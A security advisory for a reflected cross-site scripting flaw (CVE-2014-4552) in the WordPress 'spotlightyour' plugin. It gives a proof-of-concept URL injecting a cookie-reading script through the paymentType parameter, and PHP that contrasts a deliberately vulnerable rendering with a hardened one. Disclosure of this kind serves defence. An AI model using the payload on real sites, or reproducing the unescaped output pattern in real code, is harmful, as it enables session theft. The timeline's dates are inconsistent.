wp-plugin : spotlightyour

Plugin Details
Plugin Name: wp-plugin : spotlightyour
Affected Version : 4.7 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS), reflected via the paymentType GET parameter
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/spotlightyour/library/includes/payment/paypalexpress/DoDirectPayment.php?paymentType=paymentType%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

URL-decoded, the paymentType value is: paymentType"><script>alert(document.cookie)</script>
The leading "> closes a quoted HTML attribute and its tag, so the parameter is reflected unescaped inside an attribute value (for example a hidden form field); the rest of the payload is then parsed as a live script element. The request needs no session, so the payload can be delivered to a victim as a plain link. Note that the PoC path uses wp-content/wp-plugs/; on a default WordPress install plugins live under wp-content/plugins/, so adjust the path to the target's actual plugin directory.
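The following PHP is an added illustration for this advisory, not code taken from the spotlightyour plugin or from PayPal's SDK. It reconstructs the output pattern the payload implies (a GET parameter echoed unescaped into a quoted attribute) next to a hardened version using contextual escaping and value whitelisting. The form markup, function names and the list of accepted payment types are assumptions made for the example.

```php
<?php
// Added example, not the plugin's own code. It models the pattern that the PoC
// payload  paymentType"><script>alert(document.cookie)</script>  exploits:
// a request parameter written straight into an HTML attribute value.

// Vulnerable pattern (assumed markup): the attacker's "> terminates the value
// attribute and the <input> tag, so the <script> that follows is live markup.
function render_payment_type_vulnerable(array $get): string
{
    $paymentType = $get['paymentType'] ?? '';
    return '<input type="hidden" name="paymentType" value="' . $paymentType . '">';
}

// Hardened pattern: (1) treat paymentType as an enum and refuse anything else,
// (2) escape for the attribute context on output. Inside WordPress use
// esc_attr(); outside it, htmlspecialchars() with ENT_QUOTES so that both
// single and double quotes are encoded. The accepted values below are an
// assumption; check them against the API the plugin actually calls.
function render_payment_type_hardened(array $get): string
{
    $allowed = ['Sale', 'Authorization', 'Order'];
    $paymentType = $get['paymentType'] ?? '';
    if (!in_array($paymentType, $allowed, true)) {
        // Safe default instead of reflecting attacker-controlled text.
        $paymentType = 'Sale';
    }
    $escaped = function_exists('esc_attr')
        ? esc_attr($paymentType)
        : htmlspecialchars($paymentType, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="paymentType" value="' . $escaped . '">';
}

// Constructed input: the decoded PoC payload from this advisory.
$poc = ['paymentType' => 'paymentType"><script>alert(document.cookie)</script>'];

echo "Vulnerable output:\n", render_payment_type_vulnerable($poc), "\n\n";
echo "Hardened output:\n", render_payment_type_hardened($poc), "\n";
```

Run with `php example.php`. The vulnerable rendering emits a closed input tag followed by the injected script element; the hardened rendering emits `value="Sale"` because the payload fails the whitelist, and even a non-whitelisted path would have produced `&quot;&gt;&lt;script&gt;...` rather than live markup.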


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : 2014-05-25
CVE Number : CVE-2014-4552
Plugin Description :
Spotlight is a plugin by Daily Deal Builder where you spotlight various promotions and deals. You can use our built in deal feed, or you can make, post, and share deals all around the globe by downloading this plugin and making your own daily deal website with it. Offering deals and discounts on high quality products is a great way to further monetize your existing audience.